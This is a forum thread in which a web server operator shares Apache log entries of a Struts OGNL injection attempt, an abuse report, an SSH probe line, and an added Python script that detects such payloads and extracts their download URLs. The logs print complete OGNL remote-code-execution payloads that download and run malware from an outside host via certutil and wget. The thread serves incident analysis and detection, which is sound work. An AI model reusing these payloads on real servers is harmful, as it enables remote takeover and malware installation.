Web Hack Attempt from whois 209.126.68.6

Tags
111.90.158.225, 209.126.68.6, hack, javascript, security

# 1  
Old 3 Weeks Ago
Web Hack Attempt from whois 209.126.68.6

Anyone care to take a stab at decoding this hack attempt on a web server. From the error logs:

Code:
$ cat error.log
[Mon Nov 19 18:56:44.614122 2018] [core:error] [pid 1211] (36)File name too long: [client 209.126.68.6:45105] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.641285 2018] [core:error] [pid 1268] (36)File name too long: [client 209.126.68.6:45119] AH00036: access to /${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.669095 2018] [core:error] [pid 3624] (36)File name too long: [client 209.126.68.6:45134] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop)&&(pkill loop ; wget -O .loop http://111.90.158.225/d/ft64 && chmod 777 .loop && ./.loop) &').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> ')

Examine the code above carefully, including this executable file in the code:

Code:
wget -O .loop http://111.90.158.225/d/ft32

and

Code:
wget -O .loop http://111.90.158.225/d/ft64

# 2  
Old 3 Weeks Ago
Note:

Code:
to:	        abuse@shinjiru.com.my, ipadmin@primary.net
date:	        Nov 20, 2018, 11:06 AM
subject:	Hacker / Attacker at IP addresses 209.126.68.6 and 111.90.158.225

Quote:
Hi.

We have firm evidence of someone at 209.126.68.6 attempting to execute malicious javascript code which downloads malware from 111.90.158.225.

Here are the log file entries (which we have blocked):
# 3  
Old 3 Weeks Ago
See also:

Code:
$:/var/log# grep 209.126.68.6 *log
auth.log:Nov 19 18:56:44 www sshd[5799]: Did not receive identification string from 209.126.68.6 port 41023
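
The error.log entries in post #1 and the auth.log hit in post #3 are the two places this scanner left a trace, and a defender usually wants to pull both together: which source IPs sent Struts/OGNL expressions in the request path, which second-stage download URLs those payloads name (the IoCs to block and hunt for), and whether the same IP also poked sshd. The Python below is an added example, not code from the thread; the log lines it runs on are constructed samples shaped like the ones above, with TEST-NET placeholder addresses in place of the real IPs, and the function names are mine. Note that the request only landed in the core error log here because the path was mapped to the filesystem on a host without Struts; on a real Struts deployment the same payload would show up in the access log or the application log instead, so the same regexes should be pointed at those files too.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample input (not copied from the thread); IPs are TEST-NET placeholders.
SAMPLE_ERROR_LOG = "\n".join([
    "[Mon Nov 19 18:56:44.614122 2018] [core:error] [pid 1211] (36)File name too long: "
    "[client 203.0.113.6:45105] AH00036: access to /${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#w=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").getWriter())"
    ".(#w.print(@java.lang.Runtime@getRuntime().exec('wget -O .loop http://198.51.100.25/d/ft64').getInputStream()))"
    ".(#w.close())}/index.action failed",
    "[Mon Nov 19 18:57:02.100000 2018] [core:error] [pid 1211] [client 198.51.100.7:51000] "
    "AH00128: File does not exist: /var/www/favicon.ico",
    # Same attacker, URL-encoded variant: a naive "${" grep would miss this one.
    "[Mon Nov 19 18:58:10.200000 2018] [core:error] [pid 1300] (36)File name too long: "
    "[client 203.0.113.6:45200] AH00036: access to /%24%7B%28%23_memberAccess%3D%40ognl.OgnlContext%40"
    "DEFAULT_MEMBER_ACCESS%29%7D/index.action failed",
])
SAMPLE_AUTH_LOG = "\n".join([
    "Nov 19 18:56:44 www sshd[5799]: Did not receive identification string from 203.0.113.6 port 41023",
    "Nov 19 19:00:01 www CRON[6000]: pam_unix(cron:session): session opened for user root by (uid=0)",
])

TIMESTAMP_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]")
CLIENT_RE = re.compile(r"\[client (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+\]")
# An OGNL expression embedded in a request path opens with ${ or %{ followed by ( or #.
OGNL_OPEN_RE = re.compile(r"[$%]\{\s*\(?\s*#")
# Tokens that only appear in a Struts/OGNL sandbox-escape payload, never in a normal URL.
OGNL_TOKENS = [
    "@ognl.OgnlContext@", "_memberAccess", "setMemberAccess", "getExcludedPackageNames",
    "getExcludedClasses", "@java.lang.Runtime@", "com.opensymphony.xwork2",
]
URL_RE = re.compile(r"https?://[^\s'\")]+")
SSH_NOID_RE = re.compile(
    r"sshd\[\d+\]: Did not receive identification string from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})")


def is_ognl_injection(line: str) -> bool:
    """True if the (URL-decoded) line carries an OGNL expression plus a Struts-specific token."""
    decoded = unquote(line)
    return bool(OGNL_OPEN_RE.search(decoded)) and any(tok in decoded for tok in OGNL_TOKENS)


def parse_error_log(text: str) -> list:
    """One record per flagged Apache error-log line: timestamp, client IP, download URLs named in the payload."""
    records = []
    for line in text.splitlines():
        if not is_ognl_injection(line):
            continue
        decoded = unquote(line)
        client = CLIENT_RE.search(decoded)
        ts = TIMESTAMP_RE.match(decoded)
        records.append({
            "timestamp": ts.group("ts") if ts else None,
            "ip": client.group("ip") if client else None,
            "urls": sorted(set(URL_RE.findall(decoded))),
        })
    return records


def ssh_probe_sources(text: str) -> set:
    """IPs that opened an SSH connection without sending an identification string (a scanner tell)."""
    return {m.group("ip") for m in SSH_NOID_RE.finditer(text)}


def correlate(error_text: str, auth_text: str) -> dict:
    """Per source IP: number of OGNL attempts, second-stage URLs seen, and whether it also probed sshd."""
    probes = ssh_probe_sources(auth_text)
    summary = defaultdict(lambda: {"ognl_hits": 0, "payload_urls": set(), "ssh_probe": False})
    for rec in parse_error_log(error_text):
        entry = summary[rec["ip"]]
        entry["ognl_hits"] += 1
        entry["payload_urls"].update(rec["urls"])
        entry["ssh_probe"] = rec["ip"] in probes
    return {ip: {**e, "payload_urls": sorted(e["payload_urls"])} for ip, e in summary.items()}


if __name__ == "__main__":
    for ip, e in correlate(SAMPLE_ERROR_LOG, SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {e['ognl_hits']} OGNL attempt(s), ssh probe={e['ssh_probe']}, "
              f"second-stage URLs={e['payload_urls']}")
```

Requiring both the `${(#` opener and one Struts-specific token keeps ordinary `${...}` template strings in URLs from being flagged, and decoding before matching catches the percent-encoded form that the second sample line uses. The URLs the function extracts are the same kind of indicator the poster pulled out by hand (`http://111.90.158.225/d/ft32` and `ft64`), ready to be fed to a blocklist or an abuse report.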

# 4  
Old 3 Weeks Ago
# 5  
Old 3 Weeks Ago
See all this PDF:

https://infosec.cert-pa.it/analyze/7...5e1d793b4b.pdf

Google 111.90.158.225 to learn more if you are interested in malware.
Unix & Linux Forums Content Copyright 1993-2018. All Rights Reserved.